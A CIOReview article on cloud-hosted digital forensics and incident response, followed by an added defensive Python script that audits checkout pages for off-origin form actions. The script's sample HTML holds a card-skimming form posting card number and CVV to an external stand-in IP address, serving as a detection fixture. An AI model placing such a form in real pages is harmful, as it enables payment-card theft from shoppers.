CIOReview | August 2018 | 9

responder physically access the system in the cloud-hosting facility? Many third-party facilities don't allow direct access to physical servers under their custody and control.

If access is possible, can an image of the collected data be exported to a network share or storage device at the third-party cloud-hosting facility? If the digital investigation requires imaging a large system, possibly with a Network Attached Storage (NAS) device, finding a place on the network for the forensically acquired information can be a challenge. It's important to work with your cloud-hosting facility to understand how the forensic acquisition of a large amount of data within their cloud storage environment will occur.

If remote imaging is the only option for evidence acquisition, then understanding and testing the access and forensic imaging process with your third-party cloud-hosting facility becomes even more critical, as data outputs may still be needed from local storage. Working through this proactively may prevent delays in acquisition. We have witnessed first-hand that having to work through multiple authorizations to gain physical, or even logical, access to your stored data during an ongoing cybersecurity incident can introduce unnecessary delays.

Have a mature cloud-hosting provider on your side

With this in mind, review your cloud-hosting services agreement in terms of being able to gather the evidence and information--systems, memory, logs, and data--that you'll need for a forensic investigation. We've read solid agreements that prescribe compliance with customer requests but fall apart under the intense demands and rapid responses required during a cybersecurity incident.

After reviewing your cloud-hosting services agreement, dry-run the cloud-hosting facility's ticketing system. These generally aren't designed to expedite the forensic imaging of systems under their care and control. Ask the cloud-hosting services provider to share their incident response plan and any FAQs on how they'll respond to incidents and, in doing so, how they'll cooperate with their customer during a cybersecurity incident.

It's critical to ensure your cloud-hosting facility is aware that, in the event of a cybersecurity incident affecting your data at their location, you'll be requesting their cooperation. This is integral to accessing your data so that investigative responders can work as quickly and efficiently as possible. Remember, seasoned cloud-hosting service providers are mature in data privacy and security, and should be experienced in dealing with the aspects of digital forensics and incident response.

An example of Cloud Storming--"The Acumulus Datum"

A scenario in the Verizon 2017 Data Breach Digest (DBD) illustrates why these precautions are so important. In this cloud-based digital forensics investigation, the victim organization had received customer complaints regarding their e-commerce website. The first attempt at payment would fail; however, upon a second attempt, the transaction would go through. An inspection of the web page found it to be fake, prompting the victim organization to quickly take it offline.

It turns out a low-cost cloud service provider hosted the data halfway across the globe--fortunately, investigative responders were on standby. After finally getting to the data, we were able to determine that the fake payment page was coded to upload credit card data in real time to an external IP address, and the second payment attempt processed the data legitimately. The story had a happy ending, as the investigation revealed a flaw in the threat actor's code and no data was actually taken.

General recommendations for security in the cloud

Several additional prevention, mitigation, response and investigation recommendations for cloud-related data breaches and cybersecurity incidents are summarized as follows:

· Authenticate using multiple factors--at a minimum, implement two-factor authentication for access to all critical systems.
· Limit access to critical assets--restrict direct access to trusted users and IP addresses only.
· Make log data impactful--enable and centralize logging in a way that's easy for investigative responders to access during a cybersecurity incident.
· Leverage incident response playbooks--create incident response playbooks for the most relevant data breach and other cybersecurity incidents for your industry and organization.
· Change admin passwords immediately--change local and network administrator passwords first in the event of a data breach.
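The fake payment page in the DBD scenario above submitted card data to an external IP address, a change that can be caught by routinely checking where the checkout page's forms and scripts point. The following is an added example, not code from the article or from Verizon; it parses a constructed checkout page and flags any form action or script source whose host differs from the shop's own hostname (shop.example and 203.0.113.7 are made-up values).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class OffOriginAuditor(HTMLParser):
    """Collect form actions and script sources that leave the shop's own origin."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def _is_off_origin(self, url):
        # Relative URLs have no hostname and stay on-origin; anything else is
        # compared against the site host (port is stripped by .hostname).
        host = urlparse(url).hostname
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and self._is_off_origin(a.get("action") or ""):
            self.findings.append(("form-action", a["action"]))
        elif tag == "script" and self._is_off_origin(a.get("src") or ""):
            self.findings.append(("script-src", a["src"]))


def audit_checkout_page(html, site_host):
    """Return a list of (kind, url) findings for off-origin forms and scripts."""
    parser = OffOriginAuditor(site_host)
    parser.feed(html)
    return parser.findings


# Constructed sample: the payment form has been altered to post card data to a
# bare external IP address, while a legitimate on-site script and coupon form remain.
SAMPLE_HTML = """
<html><body>
<script src="https://shop.example/static/checkout.js"></script>
<form id="payment" method="post" action="http://203.0.113.7/collect">
  <input name="card_number"><input name="cvv">
</form>
<form method="post" action="/checkout/submit"><input name="coupon"></form>
</body></html>
"""

if __name__ == "__main__":
    for kind, target in audit_checkout_page(SAMPLE_HTML, "shop.example"):
        print(f"OFF-ORIGIN {kind}: {target}")
```

Running the same check on a known-good copy of the page and on the live page, then diffing the findings, turns this into a simple integrity monitor for the checkout flow.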